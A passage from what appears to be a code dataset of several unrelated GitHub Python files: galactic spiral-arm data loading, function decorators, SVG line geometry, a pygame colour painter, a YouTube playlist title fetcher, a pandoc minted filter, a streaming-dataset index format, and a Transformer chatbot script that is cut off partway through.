\"\"\"\n if path is None:\n path = DATA_PATH\n self.path = path\n self.ifile = ifile\n try:\n params = numpify_dict(parse_json(os.path.join(self.path,\n self.ifile)))\n params['spiral_arms']['adict'] = init_spiral_arms()\n except IOError:\n params = {}\n params.update(new_params)\n super().__init__(params)\n\n\ndef parse_json(json_file):\n \"Parse json file\"\n with open(json_file, 'rt') as json_data:\n data = json.load(json_data)\n return data\n\n\ndef read_galparam(ifile='gal_param.json'):\n \"\"\"\n Read Galaxy parameters\n\n Parameters\n ----------\n ifile : str, optional\n\n Returns\n -------\n gal_param : dict\n\n \"\"\"\n old_param = parse_json(os.path.join(DATA_PATH, ifile))\n gal_param = {}\n\n gal_param['thick_disk'] = dict(e_density=(old_param['n1h1'] /\n old_param['h1']),\n height=old_param['h1'],\n radius=old_param['A1'],\n F=old_param['F1'])\n\n gal_param['thin_disk'] = dict(e_density=old_param['n2'],\n height=old_param['h2'],\n radius=old_param['A2'],\n F=old_param['F2'])\n\n return gal_param\n\n\ndef read_gc(ifile='ne_gc.json'):\n \"\"\" Read Galactic Center parameters\n Returns\n -------\n gc_param : dict\n dict of parameters\n\n \"\"\"\n old_param = parse_json(os.path.join(DATA_PATH, ifile))\n gc_param = {}\n\n gc_param['galactic_center'] = dict(e_density=old_param['negc0'],\n center=tuple(old_param['centroid'].\n values()),\n F=old_param['Fgc0'],\n height=old_param['hgc'],\n radius=old_param['rgc'])\n\n return gc_param\n\n\ndef read_lism(ifile='ne_lism.json'):\n \"\"\"\n Parameters\n ----------\n ifile : str, optional\n\n 
Returns\n -------\n lism_dict : dict\n\n \"\"\"\n # Read\n with open(os.path.join(DATA_PATH, ifile), 'rt') as fh:\n lism_dict = json.load(fh)\n # Return\n return lism_dict\n\n\ndef init_spiral_arms(ifile='ne_arms_log_mod.inp'):\n armsinp = os.path.join(DATA_PATH, ifile)\n # logarms = DATA_PATH + 'log_arms.out'\n\n narms = 5\n # integer armmap(5)\t\t! for remapping from Wainscoat\n # data armmap/1, 3, 4, 2, 5/\t! order to TC93 order, which is\n # ! from GC outwards toward Sun.\n armmap = [1, 3, 4, 2, 5]\n NNj = [20, 20, 20, 20, 20]\n narmpoints = 500\n ncoord = 2\n NNmax = 20\n rad = 180/np.pi\n # Arms\n arms_tbl = Table.read(armsinp, format='ascii') # a, rmin, thmin, extent\n assert len(arms_tbl) == narms\n\n r1 = np.zeros((NNmax, narms))\n th1 = np.zeros((NNmax, narms))\n kmax = np.zeros(narms).astype(int)\n arm = np.zeros((narms, narmpoints, ncoord))\n\n for j, row in enumerate(arms_tbl):\n th1[0:NNj[j], j] = (row['thmin'] +\n np.arange(NNj[j])*row['extent']/(NNj[j]-1.)) # rad\n r1[:, j] = row['rmin'] * np.exp((th1[:, j]-row['thmin'])/row['a'])\n th1[:, j] *= rad # ! deg\n # c *** begin sculpting spiral arm 2 == TC arm 3***\n if armmap[j] == 3:\n cut1 = (th1[:, j] > 370.) & (th1[:, j] <= 410.)\n r1[cut1, j] *= (1. + 0.04 * np.cos((th1[cut1, j]-390.)*180 /\n (40.*rad)))\n # c . (1. + 0.01*cos((th1(n,j)-390.)*180./(40.*rad)))\n cut2 = (th1[:, j] > 315.) & (th1[:, j] <= 370.)\n r1[cut2, j] *= (1. - 0.07 * np.cos((th1[cut2, j]-345.)*180 /\n (55.*rad)))\n # c . (1.0 - 0.08*cos((th1(n,j)-345.)*180./(55.*rad)))\n cut3 = (th1[:, j] > 180.) & (th1[:, j] <= 315.)\n r1[cut3, j] *= (1 + 0.16 * np.cos((th1[cut3, j]-260.)*180 /\n (135.*rad)))\n # (1 + 0.13* np.cos((th1[cut3,j]-260.)*180./(135.*rad)))\n # c *** begin sculpting spiral arm 4 == TC arm 2***\n if armmap[j] == 2:\n cut1 = (th1[:, j] > 290.) & (th1[:, j] <= 395.)\n r1[cut1, j] *= (1. - 0.11 * np.cos((th1[cut1, j]-350.)*180 /\n (105.*rad)))\n # c *** end arm sculpting ***\n\n \"\"\"\n open(11,file=logarms, status='unknown')\n write(11,*) 'arm n xa ya'\n \"\"\"\n # do 21 j=1,narms\n for j in range(narms):\n dth = 5.0/r1[0, j] # Python indexing\n th = th1[0, j]-0.999*dth\n # Generate spline\n cspline = CubicSpline(th1[:NNj[j], j], r1[:NNj[j], j])\n # call cspline(th1(1,j),r1(1,j),-NNj(j),th,r)\n # for k in range(narmpoints):\n # do 10 k=1,narmpoints-1\n th = th + dth * np.arange(narmpoints)\n gd_th = np.where(th <= th1[NNj[j]-1, j])[0]\n kmax[j] = np.max(gd_th) + 1 # Python indexing (we will use arange)\n r = cspline(th[gd_th])\n # x,y of each arm\n arm[j, gd_th, 0] = -r*np.sin(th[gd_th]/rad) # Python indexing\n arm[j, gd_th, 1] = r*np.cos(th[gd_th]/rad)\n\n # Wrap into a dict\n arms_dict = {}\n arms_dict['table'] = arms_tbl\n arms_dict['r1'] = r1\n arms_dict['th1'] = r1\n arms_dict['kmax'] = kmax\n arms_dict['narms'] = narms\n arms_dict['narmpoints'] = narmpoints\n arms_dict['armmap'] = armmap\n arms_dict['arm'] = arm\n return arms_dict\n","repo_name":"FRBs/ne2001","sub_path":"src/ne2001/ne_io.py","file_name":"ne_io.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"36506015534","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport itertools\nfrom functools import update_wrapper\nfrom itertools import chain\nfrom copy import deepcopy\n\n\ndef disable(func):\n '''\n Disable a decorator by re-assigning the decorator's name\n to this function. 
For example, to turn off memoization:\n\n >>> memo = disable\n\n '''\n return func\n\n\ndef decorator(dec_func):\n '''\n Decorate a decorator so that it inherits the docstrings\n and stuff from the function it's decorating.\n '''\n class Decorator:\n _need_to_init = {}\n # _dec_func = dec_func\n\n def __init__(self, func):\n self._func = func\n for k, v in self._need_to_init.items():\n setattr(self, k, deepcopy(v))\n update_wrapper(self, func, updated=[])\n\n def __call__(self, *args, **kwargs):\n return dec_func(self._func, args, kwargs, mem=self)\n\n def __getattribute__(self, item):\n try:\n return super().__getattribute__(item)\n except AttributeError:\n return getattr(self._func, item)\n\n @classmethod\n def init(cls, **kwargs):\n cls._need_to_init.update(kwargs)\n\n return Decorator\n\n\n@decorator\ndef countcalls(func, args, kwargs, mem):\n '''Decorator that counts calls made to the function decorated.'''\n mem.calls += 1\n return func(*args, **kwargs)\n\ncountcalls.init(calls=0)\n\n\n@decorator\ndef memo(func, args, kwargs, mem):\n '''\n Memoize a function so that it caches all return values for\n faster future lookups.\n '''\n key = tuple(chain(args, kwargs.items()))\n if key in mem.cache:\n return mem.cache[key]\n result = func(*args, **kwargs)\n mem.cache[key] = result\n return result\n\nmemo.init(cache={})\n\n\n@decorator\ndef n_ary(func, args, kwargs, mem):\n '''\n Given binary function f(x, y), return an n_ary function such\n that f(x, y, z) = f(x, f(y,z)), etc. Also allow f(x) = x.\n '''\n if not args:\n raise TypeError('takes positional arguments')\n acc_arg = args[-1]\n for next_arg in args[-2::-1]:\n acc_arg = func(next_arg, acc_arg)\n return acc_arg\n\n\ndef trace(sep):\n '''Trace calls made to function decorated.\n\n @trace(\"____\")\n def fib(n):\n ....\n\n >>> fib(3)\n --> fib(3)\n ____ --> fib(2)\n ________ --> fib(1)\n ________ <-- fib(1) == 1\n ________ --> fib(0)\n ________ <-- fib(0) == 1\n ____ <-- fib(2) == 2\n ____ --> fib(1)\n ____ <-- fib(1) == 1\n <-- fib(3) == 3\n\n '''\n @decorator\n def dec(func, args, kwargs, mem):\n func_args = \", \".join(itertools.chain(\n (str(a) for a in args),\n (f'{k}={v}' for k, v in kwargs.items())\n ))\n func_call = f'{func.__name__}({func_args})'\n print(f'{sep * mem.nested} --> {func_call}')\n\n mem.nested += 1\n result = func(*args, **kwargs)\n mem.nested -= 1\n\n print(f'{sep * mem.nested} <-- {func_call} == {result}')\n return result\n dec.init(nested=0)\n return dec\n\n\n\n@memo\n@countcalls\n@n_ary\ndef foo(a, b):\n return a + b\n\n\n@countcalls\n@memo\n@n_ary\ndef bar(a, b):\n return a * b\n\n\n@countcalls\n@trace(\" \")\n@memo\ndef fib(n):\n \"\"\"Some doc\"\"\"\n return 1 if n <= 1 else fib(n-1) + fib(n-2)\n\n\ndef main():\n print(foo(4, 3))\n print(foo(4, 3, 2))\n print(foo(4, 3))\n print(\"foo was called\", foo.calls, \"times\")\n\n print(bar(4, 3))\n print(bar(4, 3, 2))\n print(bar(4, 3, 2, 1))\n print(\"bar was called\", bar.calls, \"times\")\n\n print(fib.__doc__)\n fib(10)\n print(fib.calls, 'calls made')\n # 19 - т.к. 
счётчик стоит до мемоизации, так что вытягивание значения из кеша тоже считается.\n # Я бы переставил memo и countcalls местами, тогда будет 11 (что соответствует идеологически и трейсу)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"borograam/otus","sub_path":"01_advanced_basics/deco/deco.py","file_name":"deco.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73976355048","text":"import lxml.etree as ET\nimport math\n\nfrom .Point import Point\nfrom . import styles\n\nclass Line:\n def __init__(self, a, b, style_update={}):\n \"\"\"\n point, point, dict -> None\n :param a: a point on the line\n :param b: a point on the line\n :param [style_update]: the updated style of the line\n \"\"\"\n self.a = a\n self.b = b\n\n self.dx = self.b.x - self.a.x\n self.dy = self.b.y - self.a.y\n\n # length of the line\n self.length = math.sqrt(self.dx**2 + self.dy**2)\n # rounded length of the line\n self.rlength = round(self.length)\n\n # style sheet for the line\n self.__style = {**styles.line, **style_update}\n self.__style['x1'] = str(a.x)\n self.__style['y1'] = str(a.y)\n self.__style['x2'] = str(b.x)\n self.__style['y2'] = str(b.y)\n\n self.node = ET.Element('line', self.__style)\n","repo_name":"JDong3/euclidean","sub_path":"objects/geometry/Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19111243507","text":"import pygame\nimport random\n\n\n\npygame.init()\nwin = pygame.display.set_mode((800,560))\npygame.display.set_caption('Paint screen with random colors')\n\n\nw=20\nh=20\nrun = True\nwhile run:\n\n \n \n for event in pygame.event.get():\n #print (event)\n if event.type == pygame.QUIT:\n run = False\n\n for y in range(0,560,w):\n for x in range(0,800,h):\n pygame.time.delay(8)\n pygame.draw.rect(win, (random.randrange(226),random.randrange(226),random.randrange(226)), (x,y,w,h))\n pygame.display.update()\n\n win.fill((0,0,0))\n\npygame.quit()\n","repo_name":"dev-arctik/Paint-Canvas","sub_path":"8a.Paint screen with random color.py","file_name":"8a.Paint screen with random color.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70018823528","text":"from time import time\nfrom pytube import YouTube, Playlist\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\ndef get_playlist():\n \"\"\"\n Asks user for playlist title\n \"\"\"\n\n \n\n# playlist_link = \"https://www.youtube.com/playlist?list=PLJKfZ_cKGyLdYqdzGLCJPbsi9UGCcEc5e\"\nplaylist_link = \"https://www.youtube.com/playlist?list=PLHtZ4BshlOJW8f5QAr9d3tOMcggdAmKgW\"\nvideo_links = Playlist(playlist_link).video_urls\nstart = time()\n\n\ndef get_video_title(link):\n title = YouTube(link).title\n return title\n\n\nprocesses = []\nwith ThreadPoolExecutor(max_workers=10) as executor:\n for url in video_links:\n processes.append(executor.submit(get_video_title, url))\n\nvideo_titles = []\nfor task in as_completed(processes):\n video_titles.append(task.result())\n print(task.result())\n\n\nprint(f'Time taken: {time() - start}')\n","repo_name":"wolftales/playlist","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"3736787920","text":"#!/usr/bin/env python3\n''' A pandoc filter that has the LaTeX writer use minted for typesetting code.\n\nUsage:\n pandoc --filter ./minted.py -o myfile.tex myfile.md\n'''\n\nfrom string import Template\nfrom pandocfilters import toJSONFilter, RawBlock, RawInline\n\n\ndef unpack_code(value, language):\n ''' Unpack the body and language of a pandoc code element.\n\n Args:\n value contents of pandoc object\n language default language\n '''\n [[_, classes, attributes], contents] = value\n\n if len(classes) > 0:\n language = classes[0]\n\n attributes = ', '.join('='.join(x) for x in attributes)\n\n return {'contents': contents, 'language': language,\n 'attributes': attributes}\n\n\ndef unpack_metadata(meta):\n ''' Unpack the metadata to get pandoc-minted settings.\n\n Args:\n meta document metadata\n '''\n settings = meta.get('pandoc-minted', {})\n if settings.get('t', '') == 'MetaMap':\n settings = settings['c']\n\n # Get language.\n language = settings.get('language', {})\n if language.get('t', '') == 'MetaInlines':\n language = language['c'][0]['c']\n else:\n language = None\n\n return {'language': language}\n\n else:\n # Return default settings.\n return {'language': 'text'}\n \n\ndef minted(key, value, format, meta):\n ''' Use minted for code in LaTeX.\n\n Args:\n key type of pandoc object\n value contents of pandoc object\n format target output format\n meta document metadata\n '''\n if format != 'latex':\n return\n\n # Determine what kind of code object this is.\n if key == 'CodeBlock':\n template = Template(\n '\\\\begin{minted}[$attributes]{$language}\\n$contents\\n\\end{minted}'\n )\n Element = RawBlock\n else:\n return\n\n settings = unpack_metadata(meta)\n\n code = unpack_code(value, settings['language'])\n\n return [Element(format, template.substitute(code))]\n\n\nif __name__ == '__main__':\n toJSONFilter(minted)\n\n","repo_name":"spearbit-audits/report-template","sub_path":"pandoc-minted.py","file_name":"pandoc-minted.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"72638587368","text":"import math\nfrom io import BufferedIOBase, BufferedReader, BufferedWriter, BytesIO\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nfrom numpy.typing import NDArray\n\nfrom composer.datasets.streaming.world import World\n\n__all__ = [\n \"get_index_basename\",\n \"get_shard_basename\",\n \"sample_dict_to_bytes\",\n \"bytes_to_sample_dict\",\n \"StreamingDatasetIndex\",\n]\n\n\ndef get_index_basename() -> str:\n \"\"\"Get the basename for a streaming dataset index.\n\n Returns:\n str: Basename of file.\n \"\"\"\n return 'index.mds'\n\n\ndef get_shard_basename(shard: int) -> str:\n \"\"\"Get the basename for a streaming dataset shard.\n\n Args:\n shard (int): Shard index.\n\n Returns:\n str: Basename of file.\n \"\"\"\n return f'{shard:06}.mds'\n\n\ndef sample_dict_to_bytes(obj: Dict[str, bytes], keys: List[str]) -> bytes:\n \"\"\"Dump a sample dict to bytes, given field names.\n\n Args:\n obj (Dict[str, bytes]): The sample dict to encode.\n keys (list of str): The field names.\n\n Returns:\n bytes: The encoded sample bytes.\n \"\"\"\n values = []\n for key in keys:\n value = obj[key]\n values.append(value)\n sizes = list(map(len, values))\n sizes = np.array(sizes, np.int64)\n return sizes.tobytes() + b''.join(values)\n\n\ndef bytes_to_sample_dict(data: bytes, keys: List[str]) -> Dict[str, bytes]:\n \"\"\"Load a sample dict from 
bytes and field names.\n\n Args:\n data (bytes): The encoded sample data.\n keys (List[str]): The field names. Must be in the same order as the ``keys`` used when calling :func:`.sample_dict_to_bytes`.\n\n Returns:\n Dict[str, bytes]: The decoded sample dict.\n \"\"\"\n num_values = len(keys)\n sizes = np.frombuffer(data[:num_values * np.int64().nbytes], np.int64)\n ends = num_values * np.int64().nbytes + sizes.cumsum()\n begins = ends - sizes\n values = []\n for begin, end in zip(begins, ends):\n value = data[begin:end]\n values.append(value)\n return dict(zip(keys, values))\n\n\ndef read_array(fp: BufferedIOBase, count: int, dtype: type) -> np.ndarray:\n \"\"\"Load the count items from the file handle, advancing its position.\n\n Args:\n fp (BufferedIOBase): File handle.\n count (int): Number of items to read.\n dtype (type): Item datatype.\n\n Returns:\n np.ndarray: The read array.\n \"\"\"\n num_bytes = count * dtype().nbytes\n data = fp.read(num_bytes)\n return np.frombuffer(data, dtype)\n\n\nclass StreamingDatasetIndex(object):\n \"\"\"Streaming Dataset index file, containing all the info about shards and samples.\n\n The shards are binary buffers with samples concatenated together. All the\n offset info across the whole dataset is contained in the index file. Workers\n read this file to calculate how much of which shards their slice is.\n\n Each sample is a dict of str to bytes. All samples must contain the same\n dict keys (fields). These strings are stored in the index file for\n efficiency.\n\n Args:\n samples_per_shard (NDArray[np.int64]): Number of samples of each shard.\n bytes_per_shard (NDArray[np.int64]): Size in bytes of each shard.\n bytes_per_sample (NDArray[np.int64]): Size in bytes of each sample across all shards.\n fields (List[str]): The names of the samples' fields in order.\n \"\"\"\n\n def __init__(self, samples_per_shard: NDArray[np.int64], bytes_per_shard: NDArray[np.int64],\n bytes_per_sample: NDArray[np.int64], fields: List[str]) -> None:\n self.samples_per_shard = samples_per_shard\n self.bytes_per_shard = bytes_per_shard\n self.bytes_per_sample = bytes_per_sample\n self.fields = fields\n\n # Totals.\n self.num_shards = len(samples_per_shard)\n self.total_bytes = sum(bytes_per_shard)\n self.total_samples = len(bytes_per_sample)\n self.num_fields = len(fields)\n\n # Shard -> sample range.\n self.shard_ends = self.samples_per_shard.cumsum()\n self.shard_begins = self.shard_ends - self.samples_per_shard\n\n # Sample -> shard, byte offset within shard.\n self.sample_shards, self.sample_shard_offsets = self._locate_samples()\n\n @classmethod\n def loads(cls, data: bytes):\n \"\"\"Load a StreamingDatasetIndex from raw bytes.\n\n Args:\n data (bytes): The serialized form.\n\n Returns:\n cls: The loaded object.\n \"\"\"\n fp = BytesIO(data)\n return cls.load(fp)\n\n @classmethod\n def load(cls, fp: Union[BufferedReader, BytesIO]):\n \"\"\"Load a StreamingDatasetIndex from a file handle.\n\n Args:\n fp (file): The file to read.\n\n Returns:\n cls: The loaded object.\n \"\"\"\n magic, version, num_shards = read_array(fp, 3, np.uint32)\n assert magic == 0xDA7AD06E\n assert version == 1\n total_samples, total_bytes = read_array(fp, 2, np.int64)\n del total_bytes\n samples_per_shard = read_array(fp, num_shards, np.int64)\n bytes_per_shard = read_array(fp, num_shards, np.int64)\n bps_format, = read_array(fp, 1, np.int32)\n if not bps_format:\n sample_bytes, = read_array(fp, 1, np.int64)\n bytes_per_sample = np.full(total_samples, sample_bytes)\n elif bps_format == 1:\n 
bytes_per_sample = read_array(fp, total_samples, np.int8)\n elif bps_format == 2:\n bytes_per_sample = read_array(fp, total_samples, np.int16)\n elif bps_format == 4:\n bytes_per_sample = read_array(fp, total_samples, np.int32)\n elif bps_format == 8:\n bytes_per_sample = read_array(fp, total_samples, np.int64)\n else:\n assert False\n bytes_per_sample = bytes_per_sample.astype(np.int64)\n num_fields, = read_array(fp, 1, np.int32)\n bytes_per_field = read_array(fp, num_fields, np.int32)\n fields = [fp.read(size).decode('utf-8') for size in bytes_per_field]\n return cls(samples_per_shard, bytes_per_shard, bytes_per_sample, fields)\n\n def dumps(self) -> bytes:\n \"\"\"Dump a StreamingDatasetIndex to raw bytes.\n\n Returns:\n bytes: The serialized form.\n \"\"\"\n magic = 0xDA7AD06E\n version = 1\n header = np.array([magic, version, self.num_shards], np.uint32)\n totals = np.array([self.total_samples, self.total_bytes], np.int64)\n if not len(self.bytes_per_sample):\n bps_format = 1\n bps = self.bytes_per_sample.astype(np.int8)\n elif len(set(self.bytes_per_sample)) == 1:\n bps_format = 0\n bps = np.int64(self.bytes_per_sample[0])\n else:\n max_bps = self.bytes_per_sample.max()\n if max_bps < 256:\n bps_format = 1\n bps = self.bytes_per_sample.astype(np.int8)\n elif max_bps < (1 << 16):\n bps_format = 2\n bps = self.bytes_per_sample.astype(np.int16)\n elif max_bps < (1 << 32):\n bps_format = 4\n bps = self.bytes_per_sample.astype(np.int32)\n else:\n bps_format = 8\n bps = self.bytes_per_sample\n bps_format = np.int32(bps_format)\n num_fields = np.int32(len(self.fields))\n bytes_per_field = np.array([len(field.encode('utf-8')) for field in self.fields], np.int32)\n arrays = (header, totals, self.samples_per_shard, self.bytes_per_shard, bps_format, bps, num_fields,\n bytes_per_field)\n array_bytes = b''.join([arr.tobytes() for arr in arrays])\n field_bytes = b''.join([field.encode('utf-8') for field in self.fields])\n return array_bytes + field_bytes\n\n def dump(self, fp: BufferedWriter) -> None:\n \"\"\"Dump a StreamingDatasetIndex to the file.\n\n Args:\n fp (file): The file to write.\n \"\"\"\n data = self.dumps()\n fp.write(data)\n\n def _locate_samples(self) -> Tuple[NDArray[np.int64], NDArray[np.int64]]:\n \"\"\"Precompute the shard and byte offset within the shard of every sample.\n\n Returns:\n sample_shards (NDArray[np.int64]): Shard per sample.\n sample_shard_offsets (NDArray[np.int64]): Intra-shard byte offset per sample.\n \"\"\"\n shard_ends = self.bytes_per_shard.cumsum()\n shard_begins = shard_ends - self.bytes_per_shard\n\n sample_shard_begins = []\n sample_shards = []\n for shard, (num_samples, shard_begin) in enumerate(zip(self.samples_per_shard, shard_begins)):\n sample_shard_begins += [shard_begin] * num_samples\n sample_shards += [shard] * num_samples\n sample_shard_begins = np.array(sample_shard_begins, np.int64)\n sample_shards = np.array(sample_shards, np.int64)\n\n sample_ends = self.bytes_per_sample.astype(np.int64).cumsum()\n sample_begins = sample_ends - self.bytes_per_sample\n sample_shard_offsets = sample_begins - sample_shard_begins\n return sample_shards, sample_shard_offsets\n\n def get_partition(self, world: World, batch_size: Optional[int] = None) -> Tuple[List[int], int, int]:\n \"\"\"Get the shards and sample range of a given partition of the dataset.\n\n Args:\n world (World): Context about workers, devices, and nodes.\n batch_size (Optional[int]): Hint the batch_size that will be used on each device's DataLoader.\n Worker indices will be constructed so 
that there is at most 1 incomplete batch at the end of each epoch.\n E.g. if the DataLoader is reading over (samples=[0, 1, 2, 3, 4, 5, 6, 7], num_workers=3, batch_size=2, drop_last=True)\n but `batch_size` is not hinted to the StreamingDataset ahead of time\n then the samples will by default be assigned like: w0: [0, 1, 2], w1: [3, 4, 5], w2: [6, 7]\n and will be read as batches: [0, 1], [3, 4], [6, 7] (with batches [2] and [5] dropped as incomplete)\n but this is suboptimal because we could have dropped no samples.\n So when `batch_size` is provided as a hint, we assign samples like this: w0: [0, 1, 2, 3], w1: [4, 5], w2: [6, 7]\n which will be read as batches: [0, 1], [4, 5], [6, 7], [2, 3]\n\n Returns:\n shards (Sequence[int]): The shards that this partition overlaps.\n min_id (int): The lowest sample ID of this partition.\n max_id (int): The highest sample ID of this partition.\n \"\"\"\n\n global_device = world.global_device\n global_num_devices = world.global_num_devices\n device_worker = world.device_worker\n device_num_workers = world.device_num_workers\n\n # Splits a range (start, start+total) into num_parts such that:\n # each part spans a continguous range [part_min_id, part_max_id]\n # each part_i starts immediately from where the previous part_[i-1] stopped\n # all parts have the same number of items,\n # except the first K parts may have exactly 1 more item\n def _get_min_max_size(start: int, total: int, part: int, num_parts: int):\n sizes = [math.ceil((total - p) / num_parts) for p in range(num_parts)]\n min_ids = np.cumsum([0] + sizes)\n part_min_id = start + min_ids[part]\n part_max_id = start + min_ids[part + 1] - 1\n part_size = sizes[part]\n return part_min_id, part_max_id, part_size\n\n device_min_id, _, device_samples = _get_min_max_size(0, self.total_samples, global_device, global_num_devices)\n\n # Some devices may have 1 fewer sample, so repeat some samples at boundaries\n expected_device_samples = math.ceil(self.total_samples / global_num_devices)\n if device_samples < expected_device_samples:\n if device_samples != expected_device_samples - 1:\n raise RuntimeError(\"Found device partition with incorrect # samples\")\n device_min_id -= 1\n device_samples += 1\n\n if not batch_size:\n worker_min_id, worker_max_id, _ = _get_min_max_size(device_min_id, device_samples, device_worker,\n device_num_workers)\n else:\n device_batches = math.ceil(device_samples / batch_size)\n samples_missing = device_batches * batch_size - device_samples\n\n # Determine which batches this worker is responsible for\n worker_min_batch_id, worker_max_batch_id, _ = _get_min_max_size(0, device_batches, device_worker,\n device_num_workers)\n\n # The last device_worker to be read from will be the one with the incomplete batch.\n # This is done to match PyTorch DataLoader's round-robin scheduling of workers\n # All device_workers must be careful to account for the missing samples offset by the incomplete batch\n incomplete_device_worker = (device_batches + device_num_workers - 1) % device_num_workers\n min_id_offset = 0 if device_worker <= incomplete_device_worker else samples_missing\n max_id_offset = 0 if device_worker < incomplete_device_worker else samples_missing\n\n worker_min_id = device_min_id + worker_min_batch_id * batch_size - min_id_offset\n worker_max_id = device_min_id + (worker_max_batch_id + 1) * batch_size - max_id_offset - 1\n\n min_shard = self.sample_shards[worker_min_id]\n max_shard = self.sample_shards[worker_max_id]\n shards = list(range(min_shard, max_shard + 1))\n return 
shards, worker_min_id, worker_max_id\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/datasets/streaming/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":13879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30570681129","text":"import re\r\nimport tensorflow_datasets as tfds\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\n# Hyperparameters\r\nMAX_LENGTH = 55\r\nBUFFER_SIZE = 20000\r\nBATCH_SIZE = 10\r\n\r\n# Load model\r\n\r\n\r\n# Load datasets\r\nwith open(\"dataset/human_text.txt\", \"r\", encoding=\"utf_8\") as f:\r\n lines = f.read().split('\\n')\r\nwith open(\"dataset/robot_text.txt\", \"r\", encoding=\"utf_8\") as f:\r\n lines2 = f.read().split('\\n')\r\nlines = [re.sub(r\"\\[\\w+]\", \"hi\", line) for line in lines]\r\nlines = [\" \".join(re.findall(r'\\w+', line)) for line in lines]\r\n\r\nlines2 = [re.sub(r\"\\[\\w+]\", \"\", line) for line in lines2]\r\nlines2 = [\" \".join(re.findall(r\"\\w+\", line)) for line in lines2]\r\n\r\n# Build tokenizer using tfds for both questions and answers\r\ntokenizer = tfds.deprecated.text.SubwordTextEncoder.build_from_corpus(\r\n lines + lines2, target_vocab_size=2**13\r\n)\r\n\r\n# Define start and end token to indicate the start and end of a sentence\r\nSTART_TOKEN, END_TOKEN = [tokenizer.vocab_size], [tokenizer.vocab_size + 1]\r\n\r\n# Vocabulary size plus start and end token\r\nVOCAB_SIZE = tokenizer.vocab_size + 2\r\n\r\n# Tokenize, filter and pad sentences\r\ndef tokenize_and_filter(inputs, outputs):\r\n tokenized_inputs, tokenized_outputs = [], []\r\n \r\n for (sentence1, sentence2) in zip(inputs, outputs):\r\n # tokenize sentence\r\n sentence1 = START_TOKEN + tokenizer.encode(sentence1) + END_TOKEN\r\n sentence2 = START_TOKEN + tokenizer.encode(sentence2) + END_TOKEN\r\n # check tokenized sentence max length\r\n if len(sentence1) <= MAX_LENGTH and len(sentence2) <= MAX_LENGTH:\r\n tokenized_inputs.append(sentence1)\r\n tokenized_outputs.append(sentence2)\r\n \r\n # pad tokenized sentences\r\n tokenized_inputs = tf.keras.preprocessing.sequence.pad_sequences(\r\n tokenized_inputs, maxlen=MAX_LENGTH, padding='post')\r\n tokenized_outputs = tf.keras.preprocessing.sequence.pad_sequences(\r\n tokenized_outputs, maxlen=MAX_LENGTH, padding='post')\r\n \r\n return tokenized_inputs, tokenized_outputs\r\n\r\n\r\nquestions, answers = tokenize_and_filter(lines, lines2)\r\n\r\n# decoder inputs use the previous target as input\r\n# remove START_TOKEN from targets\r\ndataset = tf.data.Dataset.from_tensor_slices((\r\n {\r\n 'inputs': questions,\r\n 'dec_inputs': answers[:, :-1]\r\n },\r\n {\r\n 'outputs': answers[:, 1:]\r\n },\r\n))\r\n\r\n# The first time the dataset is iterated over, its elements will be cached either in the specified file or in memory. 
Subsequent iterations will use the cached data.\r\ndataset = dataset.cache()\r\ndataset = dataset.shuffle(BUFFER_SIZE)\r\n# Combines consecutive elements of this dataset into batches.\r\ndataset = dataset.batch(BATCH_SIZE)\r\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\r\n\r\n# Implementation of a scaled dot-product attention layer\r\ndef scaled_dot_product_attention(query, key, value, mask):\r\n matmul_qk = tf.matmul(query, key, transpose_b=True)\r\n\r\n depth = tf.cast(tf.shape(key)[-1], tf.float32)\r\n logits = matmul_qk / tf.math.sqrt(depth)\r\n\r\n # add the mask zero out padding tokens.\r\n if mask is not None:\r\n logits += (mask * -1e9)\r\n\r\n attention_weights = tf.nn.softmax(logits, axis=-1)\r\n\r\n return tf.matmul(attention_weights, value)\r\n\r\n# Implementation of multi-head attention layer with model subclassing\r\nclass MultiHeadAttention(tf.keras.layers.Layer):\r\n\r\n def __init__(self, d_model, num_heads, name=\"multi_head_attention\"):\r\n super(MultiHeadAttention, self).__init__(name=name)\r\n self.num_heads = num_heads\r\n self.d_model = d_model\r\n\r\n assert d_model % self.num_heads == 0\r\n\r\n self.depth = d_model // self.num_heads\r\n\r\n self.query_dense = tf.keras.layers.Dense(units=d_model)\r\n self.key_dense = tf.keras.layers.Dense(units=d_model)\r\n self.value_dense = tf.keras.layers.Dense(units=d_model)\r\n\r\n self.dense = tf.keras.layers.Dense(units=d_model)\r\n\r\n def split_heads(self, inputs, batch_size):\r\n inputs = tf.reshape(\r\n inputs, shape=(batch_size, -1, self.num_heads, self.depth))\r\n return tf.transpose(inputs, perm=[0, 2, 1, 3])\r\n\r\n def call(self, inputs):\r\n query, key, value, mask = inputs['query'], inputs['key'], inputs[\r\n 'value'], inputs['mask']\r\n batch_size = tf.shape(query)[0]\r\n\r\n # linear layers\r\n query = self.query_dense(query)\r\n key = self.key_dense(key)\r\n value = self.value_dense(value)\r\n\r\n # split heads\r\n query = self.split_heads(query, batch_size)\r\n key = self.split_heads(key, batch_size)\r\n value = self.split_heads(value, batch_size)\r\n\r\n scaled_attention = scaled_dot_product_attention(query, key, value, mask)\r\n\r\n scaled_attention = 